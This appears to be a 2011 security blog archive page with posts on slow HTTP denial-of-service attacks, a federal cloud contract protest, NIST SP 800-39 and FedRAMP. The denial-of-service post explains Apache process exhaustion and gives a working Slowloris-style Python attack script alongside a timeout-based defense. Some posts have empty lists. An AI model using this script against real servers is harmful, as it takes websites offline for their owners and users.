DHS is Looking for a CISO
Posted November 4th, 2011 by rybolov
Posted in FISMA, NIST, Odds-n-Sods | 1 Comment »
Tags: compliance • government • infosec • itsatrap • job • NIST • risk • security
Usually when people think about Denial of Service attacks nowadays, they picture the Anonymous kids running their copies of LOIC in a hivemind or Russian gangsters building a botnet to run an online protection racket. But there is a new-ish attack technique floating around that I believe will become more important over the next year or two: slow HTTP attacks.
How Slow DOS Works
Webservers run an interesting version of process management. When you start an Apache server, it starts a master process that spawns a number of listener processes (or threads) as defined by StartServers (5-10 is a good starting number). Each listener serves a number of requests, defined by MaxRequestsPerChild (1000 is a good number here), and then dies to be replaced by another process/thread by the master server. This recycling is done so that if any applications leak memory, the leak gets cleaned up when the process dies instead of slowly strangling the server. As more requests are received, more processes/threads are spawned, up to the MaxClients setting. MaxClients is designed to throttle the number of processes so that Apache doesn’t forkbomb and the OS doesn’t become unmanageable because it’s thrashing to swap. There are also some rules for weaning off idle processes, but those are immaterial to what we’re trying to do today.
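To make that lifecycle concrete, here’s a toy sketch of the prefork model in Python (Apache itself is C, and this compresses the real logic considerably; the directive-named constants and the respawn-on-death loop are simplifications for illustration, not Apache’s actual behavior):

```python
import os
import socket

# Illustrative stand-ins for the Apache directives discussed above.
START_SERVERS = 5               # StartServers: initial listener count
MAX_REQUESTS_PER_CHILD = 1000   # MaxRequestsPerChild: quota before a child dies
MAX_CLIENTS = 150               # MaxClients: hard cap on concurrent listeners

def child_loop(listener: socket.socket) -> None:
    """Serve a bounded number of requests, then exit. The master replaces
    us, which is what keeps a leaky application from eating the box."""
    for _ in range(MAX_REQUESTS_PER_CHILD):
        conn, _addr = listener.accept()
        conn.recv(4096)  # toy version: assume one read gets the whole request
        conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
        conn.close()
    os._exit(0)  # die on purpose; see MaxRequestsPerChild above

def fork_child(listener: socket.socket) -> int:
    pid = os.fork()
    if pid == 0:
        child_loop(listener)  # never returns; child exits when quota is hit
    return pid

def master() -> None:
    listener = socket.socket()
    listener.bind(("0.0.0.0", 8080))
    listener.listen(128)
    children = {fork_child(listener) for _ in range(START_SERVERS)}
    while True:
        pid, _status = os.wait()         # a child hit its quota and died
        children.discard(pid)
        if len(children) < MAX_CLIENTS:  # never spawn past the cap
            children.add(fork_child(listener))

if __name__ == "__main__":
    master()
```

The real server also spawns new children in response to load rather than only on death, but the bounded-lifetime, bounded-count shape is the part that matters for the attack below.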
What happens in a slow DOS is that the attack tool sends an HTTP request that never finishes. As a result, each listener process never finishes its quota of MaxRequestsPerChild so that it can die. By sending a small number of never-completing requests, the attacker gets Apache to gladly spawn new processes/threads up to MaxClients, at which point it fails to answer requests and the site is DOS’ed. The higher the rate of listener process turnover, the faster the server stops answering requests. For a poorly tuned webserver configuration with MaxClients set too high, the server starts thrashing to swap before it even hits MaxClients, and to top it off, the box becomes unresponsive even to ssh connections and needs a hard boot.
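Here’s what that looks like from the attacker’s side: a minimal Python sketch of the never-finishing request trick, the same basic idea the Slowloris-style tools implement. The target, connection count, and trickle interval are all placeholder values, and obviously, don’t point this at anything you don’t own:

```python
import socket
import time

TARGET = ("target.example.com", 80)  # placeholder host
CONNECTIONS = 150                    # aim at the server's MaxClients
TRICKLE_INTERVAL = 10                # seconds between keep-alive bytes

# Open connections and send a request line plus one header -- but never
# the blank line that terminates the header block, so from Apache's
# perspective the request simply never finishes.
conns = []
for _ in range(CONNECTIONS):
    s = socket.create_connection(TARGET, timeout=5)
    s.sendall(b"GET / HTTP/1.1\r\nHost: target.example.com\r\n")
    conns.append(s)

# Periodically trickle one more bogus header down each connection so the
# server's timeouts never fire; every held connection pins a listener.
while conns:
    time.sleep(TRICKLE_INTERVAL)
    for s in list(conns):
        try:
            s.sendall(b"X-a: b\r\n")
        except OSError:
            conns.remove(s)  # server dropped us; a real tool reconnects
```

Note how lopsided the economics are: a few hundred sockets and a trickle of bytes on the attacker’s side, versus a whole process or thread pinned on the server for every one of them.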
The beauty of this is that, for a well-tuned Apache, the theoretical minimum number of requests needed to make the server hang is equal to MaxClients. This attack can also take out web boundary devices: reverse proxies, Web Application Firewalls, load balancers, content switches, and anything else that receives HTTP(S).
Post photo by Salim Virji.
Advantages to Slow DOS Attacks
There are a couple of reasons why slow DOS tools are getting research and development attention this year, and why I see them growing in popularity.
Defenses
This part is fun, and by that I mean “it sucks”. There are some things that help, but there isn’t a single solution that makes the problem go away.
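One example of a partial fix: bound how long you’ll wait for a complete request, which is the idea behind Apache’s mod_reqtimeout and similar knobs on proxies and load balancers. Here’s a toy asyncio sketch of the principle; the 10-second deadline is an arbitrary illustrative value, and this is a demonstration server, not a drop-in defense:

```python
import asyncio

HEADER_DEADLINE = 10  # seconds allowed to finish sending headers (illustrative)

async def handle(reader: asyncio.StreamReader,
                 writer: asyncio.StreamWriter) -> None:
    try:
        # A legitimate client sends its headers (terminated by a blank
        # line) almost immediately; a slow DOS client never does.
        await asyncio.wait_for(reader.readuntil(b"\r\n\r\n"), HEADER_DEADLINE)
    except (asyncio.TimeoutError, asyncio.IncompleteReadError,
            asyncio.LimitOverrunError):
        writer.close()  # cut the slow client loose and free the slot
        return
    writer.write(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
    await writer.drain()
    writer.close()

async def main() -> None:
    server = await asyncio.start_server(handle, "0.0.0.0", 8080)
    async with server:
        await server.serve_forever()

if __name__ == "__main__":
    asyncio.run(main())
```

The other half of the equation is architecture: an event-driven front end (nginx-style) holds an idle slow connection for the cost of a socket instead of a whole process, which blunts the attack even before the timeouts kick in.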
Posted in Cyberwar, DDoS, Hack the Planet, Technical | 7 Comments »
Tags: apache • ddos • infosec • pwnage • risk • scalability • security
Interesting blog post on Microsoft’s TechNet, but the real gem is the case filing and summary from the DoJ (usual .pdf caveat applies). Basically, the Reader’s Digest Condensed Version is that the Department of Interior awarded a cloud services contract to Microsoft for email. The award was protested by Google for a wide variety of reasons; you can go read the full thing for all the whinging.
But this is the interesting thing to me even though it’s mostly tangential to the award protest:
So this is where I start thinking. I thunk until my thinker was sore, and these are the conclusions I came to:
And then there’s the “back story” consisting of the Cobell case and how Interior was disconnected from the Internet several times and for several years. The Rybolov interpretation is that if Google’s government cloud potentially has tribes as a tenant, it increases the risk to Interior (both in data security terms and just plain politically) beyond what they are willing to accept.
Obligatory Cloud photo by jonicdao.
Posted in FISMA, NIST, Outsourcing | 2 Comments »
Tags: 800-37 • 800-53 • accreditation • certification • cloud • cloudcomputing • compliance • fisma • government • infosec • management • NIST • risk • security
You should have seen Special Publication 800-39 (PDF file; also check out more info on Fismapedia.org) out by now. Dan Philpott and I just taught a class on understanding the document and how it affects security managers out there doing their jobs on a daily basis. While the information is still fresh in my head, I thought I would jot down some notes that might help everybody else.
The Good:
NIST is doing some good stuff here, trying to get IT Security and Information Assurance out of the “It’s the CISO’s problem, I have effectively outsourced any responsibility through the org chart” mindset and into more of what DoD calls “mission assurance”. That is, how do we go from point-in-time vulnerabilities (i.e., things that can be scored with CVSS or tested through Security Test and Evaluation) to briefing executives on the risk to their organization (Department, Agency, or even business) coming from IT security problems? It lays out an organization-wide risk management process and a framework (layer cakes within layer cakes) to share information up and down the organizational stack. This is very good, and getting the mission/business/data/program owners to recognize their responsibilities is an awesome thing.
The Bad:
While SP 800-39 is good in philosophy, with a general theme of the non-IT “business owners” taking ownership of risk, when it comes to specifics it raises more questions than it answers. For instance, it defines a function known as the Risk Executive. As practiced today by people who “get stuff done”, the Risk Executive is like a board made up of the Business Unit owners (possibly as the Authorizing Officials), the CISO, and maybe a Chief Risk Officer or other senior executives. But without that context, and without asking around to find out what people are doing to get executive buy-in, the Risk Executive seems like a non sequitur. There are other things like that, but I think the best summary is “Wow, this is great, now how do I take this guidance and execute a plan based on it?”
The Ugly:
I have a pretty simple yardstick for evaluating any kind of standard or guideline: will this be something that my auditor will understand, and will it help them help me? By that measure, 800-39 is written abstractly enough that most auditor-folk would have a hard time translating it into something they could audit for. This is both a blessing and a curse, and the huge recommendation that I have is that you brief your auditor beforehand on what 800-39 means to them and how you’re going to incorporate the guidance.
Posted in FISMA, NIST, Risk Management, What Works | 5 Comments »
Tags: 800-37 • 800-39 • accreditation • assurance • auditor • C&A • certification • comments • compliance • datacentric • fisma • government • infosec • management • NIST • risk • scalability • security
“Cloud computing is about gracefully losing control while maintaining accountability even if the operational responsibility falls upon one or more third parties.”
–CSA Security Guidance for Critical Areas of Focus in Cloud Computing V2.1
Now enter FedRAMP. FedRAMP is a way to share Assessment and Authorization information for a cloud provider with its Government tenants. In case you’re not “in the know”, you can go check out the draft process and supporting templates at FedRAMP.gov. So far, a good idea, and I really do support what’s going on with FedRAMP, except that somewhere along the line we went astray, because we tried to kluge doctrine that most people don’t understand over the top of cloud computing, which most people also don’t really understand.
I’ve already done my part and submitted comments officially; here I just want to put some ideas out there to keep the conversation going. As I see it, these are (or should be) the goals for FedRAMP:
So now for the juicy part: how would I do a “clean room” implementation of FedRAMP on Planet Rybolov, where “all the Authorizing Officials are informed, the Auditors are helpful, and every ISSO is above average”? This is my “short list” of how to get the job done:
Then there is the special-interest comment: I’ve heard some rumblings (and read some articles; shame on you, security industry press, for republishing SANS press releases) about how FedRAMP would be better accomplished by using the 20 Critical Security Controls. Honestly, this is far from the truth: a set of controls scoped to the modern enterprise (a General Support System supporting end users) or project (a Major Application) does not scale to an infrastructure-and-server cloud. While it might make sense to use the 20 CSC in other places (agency-wide controls), please do your part to squash the idea of using it for cloud computing whenever and wherever you see it.
Ramp photo by ell brown.
Posted in FISMA, Risk Management, What Works | 2 Comments »
Tags: accreditation • C&A • catalogofcontrols • certification • cloud • cloudcomputing • comments • compliance • fisma • infosec • infosharing • management • risk • scalability • security
Joan Goodchild interviewed me about some of my experiences in the big sandbox and how I was good enough at avoiding IEDs to make it there and home again, an abstract form of risk management. Go check it out. And while you’re on the subject, or if you want visuals to go along with the story, check out my Afghanistan set on Flickr.
Posted in Army, Risk Management | 1 Comment »
Tags: risk • security • speaking